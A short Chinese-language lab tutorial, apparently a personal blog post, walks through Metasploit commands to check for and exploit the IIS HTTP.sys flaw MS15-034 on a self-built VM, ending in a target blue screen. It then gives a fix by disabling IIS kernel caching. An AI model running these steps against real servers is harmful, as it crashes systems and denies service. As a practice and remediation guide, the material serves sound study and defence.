msf教学ms15-034攻击及修复

声明：本内容非真实商用网站，均为个人手工自行搭建的虚拟网站，仅为个人练习，无任何商业获利或者侵权行为。使用内容均为开源软件。

前提条件：vm虚拟iis网站，kali系统

kali打开msfconsole 

 search ms15-034

 use1 进入文件后输入info查看攻击适用范围

 set rhost 主机地址 show options 查看设置的信息

run验证是否存在漏洞。存在但是没有获取到内存信息。back返回即可。

以上是验证，下面使用攻击

use 0 然后设置目标主机 set rhost 主机地址

 exploit攻击后目标主机蓝屏崩溃 ，需谨慎使用。

修复：找到iis的输出缓存--编辑功能设置-启用内核缓存的√去掉